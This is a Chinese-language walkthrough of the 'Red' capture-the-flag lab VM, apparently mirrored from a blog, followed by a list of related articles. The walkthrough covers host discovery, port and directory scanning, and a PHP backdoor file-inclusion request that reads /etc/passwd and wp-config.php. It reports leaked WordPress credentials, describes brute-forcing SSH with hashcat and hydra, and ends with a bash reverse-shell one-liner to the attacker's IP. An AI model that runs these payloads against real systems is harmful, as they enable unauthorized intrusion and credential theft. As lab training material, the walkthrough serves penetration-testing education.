当前位置: 首页 > news >正文

Red靶机攻略

一.环境准备

1.1Red靶机环境准备

1.1.1首先将我们解压好的的jangow-01-1.0.1.ova放入虚拟机里,并配置环境。安装好靶机后打开进行配置,按住shift,在界面按e进去得到图二。

1.1.2按住ctrl+x,ip a查看网卡信息,修改网络配置文件 /etc/network/interfaces 文件(没有的话去/etc/netplan目录下的yaml文件),将里面的内容修改为下图所示。然后重启虚拟机。

1.1.3使用nano /etc/netplan/00-installer-config.yaml编写yaml文件,按 Ctrl + O 保存,再按 Ctrl + X 退出,重启靶机

二.信息搜集

2.1ip搜集

2.1.1arp-scan -l  扫描靶机ip,发现靶机ip为192.168.182.139

2.2端口扫描

2.2.1使用nmap工具对目标机进行端口扫描,发现开启了80,22端口

2.3目录扫描

2.3.1使用我们kali对目标靶机进行目录探测,用dirb命令,发现robots.txt

2.3.2访问robots.txt,看看有无可用信息,给出了一个新的网址域名。

三.搜索漏洞注入点

3.1.1在我们点击其他功能的时候出现了其他域名,并且告诉我们没有找不到网站,观察URL,这里面的网址和我们访问robots的时候给我们的网址是一样的,所以我们还需要更改我们的配置文件,这样我们才能够跳转到相应界面。因为我们是在Windows上访问我们的网站所以更改的是Windows的配置文件hosts,没有权限按下列步骤更改权限

3.1.2更改完权限后执行下列代码。将自己的ip与这个写入hosts文件中保存,就可以正常访问了

3.1.3鼠标右键查看页面源代码,浏览到77行时,有一串注释让我们寻找这个人的帮助,去浏览器中查询

3.1.4搜索这个人名之后,最终的目的是要下载这个文件,最后发现了这个文件并访问2

<1>https://github.com/Craigonanda/CommonBackdoors-PHP.fuzz.txt

<2>http://redrocks.win/NetworkFileManagerPHP.php?key=/etc/passwd

使用php伪协议访问:http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php

3.1.4通过base64解码得到如下的数据,经解码发现后,还有一串代码,尝试base64解码

3.1.5提到了账号密码,然后网站用的是wordpress框架,然后就开始找和wordpress账号密码有关的文件,利用文件包含去读取,而wordpress框架的配置文件是wp-config.php,base64解码后得到用户: john 密码: R3v_m4lwh3r3_k1nG!!

http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php

3.1.6使用ssh登录,建立连接,建立失败

建立pass.txt文件,将之前配置文件那个密码放入,然后利用hashcat对应的base64规则去枚举相关的密码,存入passlist.txt中,格式是类似于之前获得的那个密码的,最好利用hydra进行爆破,获得对应的密码

四.漏洞利用

4.1登录,并触发反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.182.130/443 0>&1'

http://www.lryc.cn/news/601818.html

相关文章:

  • 字符串是数据结构还是数据类型?
  • Day44 Java数组08 冒泡排序
  • python中的容器与自定义容器
  • Pinocchio 结合 CasADi 进行 IK 逆运动学及 Mujoco 仿真
  • 09_opencv_遍历操作图像像素
  • CIFAR100数据集实测-基于 AlexNet模型的压缩/Bagging/Boosting 探索
  • 人社部物联网安装调试员的实训平台
  • 深度学习(鱼书)day04--手写数字识别项目实战
  • 网络协议:计算机世界的“交通规则“与“社交礼仪“
  • java--WebSocket简单介绍
  • Flutter开发实战之性能优化与调试
  • 深入解析MIPI C-PHY (四)C-PHY物理层对应的上层协议的深度解析
  • Pytest 参数化进阶:掌握 parametrize 的多种用法
  • maven <dependencyManagement>标签的作用
  • AutoLabelImg:高效的数据自动化标注工具和下载
  • IndexedDB全面掌握:从入门到Odoo OWL框架实战
  • mac系统彻底删除mysql并重装
  • [AI8051U入门第十步]W5500-客户端
  • 全方位评测:11款主流指标平台优劣分析
  • FreeRTOS—队列集
  • 【Web APIs】JavaScript 节点操作 ⑩ ( 节点操作综合案例 - 动态生成表格案例 )
  • add新增管理员功能、BaseController类的简介--------示例OJ
  • 链表算法综合——重排链表
  • Webpack 和 Vite 的关键区别
  • 01人工智能中优雅草商业实战项目视频字幕翻译以及声音转译之底层处理逻辑阐述-卓伊凡|莉莉
  • J2EE模式---服务层模式
  • WAIC 2025 热点解读:如何构建 AI 时代的“视频神经中枢”?
  • Java面试题及详细答案120道之(081-100)
  • 零基础学习性能测试第五章:JVM性能分析与调优-多线程机制与运行原理
  • 【RAG技术权威指南】从原理到企业级应用实践